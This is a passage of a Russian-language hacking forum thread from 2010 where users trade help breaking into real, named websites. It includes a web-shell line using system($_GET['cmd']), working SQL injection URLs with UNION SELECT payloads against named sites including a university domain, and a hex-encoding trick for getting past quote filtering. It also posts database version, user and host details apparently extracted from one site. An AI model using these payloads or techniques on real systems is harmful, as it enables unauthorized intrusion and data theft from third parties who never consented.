18.12.2010, 15:56
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от Expl0ited
дай угадаю, в faq.php ты засунул код system($_GET['cmd']) а ОС сервера на котором стоит атакуемый сайт Windows
Используй какие-нибудь callback функции или же просто eval, для выполнения своего php кода.
не угaдал...он все правильно туда ставил и ось там была *никс...просто сайт раньше ломали и админ кое что в настройках сервера подправил...но хитрым способом это можно было обойти и в итоге шелл был залит.
|
|
|
18.12.2010, 16:43
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от Gorev
не угaдал...он все правильно туда ставил и ось там была *никс...просто сайт раньше ломали и админ кое что в настройках сервера подправил...но хитрым способом это можно было обойти и в итоге шелл был залит.
тогда что это за странная конструкция faq.php?cmd= dir?
|
|
|
|
18.12.2010, 17:02
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 38
С нами:
8128406
Репутация:
0
|
|
Народ, подскажите это PHP-inj или фрейм http://www.prodisney.ru/index.php?page=index.php и если это фрейм то что должно было быть при PHP-inj?
|
|
|
|
18.12.2010, 17:13
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от Samael91
Народ, подскажите это PHP-inj или фрейм http://www.prodisney.ru/index.php?page=index.php и если это фрейм то что должно было быть при PHP-inj?
Смотрим сурс:
Фрейм - страница вставлена во фрейм
Читалка - видешь сурс страница, в т.ч. и PHP.
PHP-inject - это include('page.php'); PHP выучи хотябы а потом уже хацкери =\\
|
|
|
|
18.12.2010, 18:17
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от Expl0ited
тогда что это за странная конструкция faq.php?cmd=
dir
?
человек не особо разбирается в никс коммандах....
|
|
|
|
18.12.2010, 22:54
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Не получается вывести версию БД.
http://www.vyo.org/index.php?events/action/show/id/event/yr/2010/mon/-12+union+select+1,2,version(),4,5,6,7,8,9+--+
|
|
|
|
18.12.2010, 23:20
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от FlaktW
Не получается вывести версию БД.
http://www.vyo.org/index.php?events/action/show/id/event/yr/2010/mon/-12+union+select+1,2,version(),4,5,6,7,8,9+--+
version: 5.0.54-log
user: vyoadb@67.199.10.33
database: dbvyoa
писать в личку и дальше спрашивать как я получил это не следует..Я УГАДАЛ !!!
ЗЫ. Вопросы по раскрутке уже задолбали
|
|
|
|
19.12.2010, 02:42
|
|
Новичок
Регистрация: 18.09.2010
Сообщений: 2
С нами:
8236406
Репутация:
-1
|
|
http://engr.oregonstate.edu/oregonstater/citation.php?id=290+and+1=0+union+select+1,2,3,4,5 ,6,column_name,8,9,10,11 FROM INFORMATION_SCHEMA.columns where table_name='USER_PRIVILEGES' --
как будет правильно составить запрос?
|
|
|
|
19.12.2010, 03:12
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами:
8456812
Репутация:
55
|
|
toX1k
могически_кавычке = on
хекс юзай и почитай маны
http://engr.oregonstate.edu/oregonstater/citation.php?id=290+and+1=0+union+select+1,2,3,4,5 ,6,column_name,8,9,10,11+FROM+INFORMATION_SCHEMA.c olumns+where+table_name=0x555345525F50524956494C45 474553--
P.S. пробелы убери
|
|
|
|
19.12.2010, 12:48
|
|
Новичок
Регистрация: 18.09.2010
Сообщений: 2
С нами:
8236406
Репутация:
-1
|
|
я так и подумал что кавычки фильтруются ('), аналога заменяющего их не нашёл
сначала char() хотел заюзать, после передумал
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
